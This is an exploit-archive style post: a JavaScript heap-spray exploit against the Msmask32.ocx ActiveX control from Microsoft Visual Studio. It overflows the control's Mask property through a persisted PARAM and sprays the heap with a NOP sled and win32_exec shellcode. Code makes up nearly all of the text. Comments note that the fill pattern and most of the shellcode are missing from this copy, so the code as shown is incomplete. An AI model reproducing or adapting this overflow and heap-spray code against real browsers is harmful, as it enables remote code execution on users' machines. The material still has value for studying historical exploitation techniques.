Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit
Author: Koshi
Original POC: ( Not by me )
My first ActiveX exploit, learned quite a bit playing with this one. Heaps are handy.
#################################################
Loaded File: C:\WINDOWS\system32\MSMASK32.OCX
Name: MSMask
Version: 1.1
Class: MaskEdBox
GUID: {C932BA85-4374-101B-A56C-00AA003668DC}
Number of Interfaces: 1
Default Interface: IMSMask
RegKey Safe for Script: False
RegKey Safe for Init: True
KillBitSet: False
gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years!

<input language=JavaScript onclick=doIt() type=button value="Test Exploit">
<script language="JavaScript">
function doIt()
{
  // The overlong Mask property is delivered as a persisted <PARAM>, which the
  // control accepts because it is marked Safe for Initialization (see above).
  var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
  var body1='"></OBJECT>';

  // 1945 repetitions of the fill pattern overflow the Mask buffer
  // (the pattern passed to unescape() is not preserved in this copy).
  var buf1 = '';
  for (i=1;i<=1945;i++){buf1=buf1+unescape("");}

  // win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2
  // (only the first ten words of the payload are preserved in this copy)
  var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949");

  // A read through "Heap Feng Shui in JavaScript" shed some
  // much needed light on this topic for me. Thank you Alexander Sotirov.
  var shellcodeSize = (shellcode.length * 2);          // in bytes: JS strings are UTF-16
  var spraySled = unescape("%u9090%u9090");            // NOP sled seed
  var heapAddress = 0x0c0c0c0c;                        // address the corrupted pointer will hit
  var heapBlockSize = 0x100000;                        // 1 MB per sprayed block
  var spraySledSize = heapBlockSize - (shellcodeSize + 1);
  var heapBlocks = (heapAddress + heapBlockSize)/heapBlockSize;  // enough 1 MB blocks to grow past heapAddress
  var x = new Array();

  // grow the sled by doubling, then trim it to spraySledSize bytes
  while (spraySled.length*2<spraySledSize)
    spraySled = spraySled+spraySled;
  spraySled = spraySled.substring(0,spraySledSize/2);

  // spray: every block is sled + shellcode, so a landing anywhere in a sled slides into the payload
  for (i=0;i<heapBlocks;i++)
    x[i] = spraySled+shellcode;

  document.write(body+buf1+body1);
}
</script>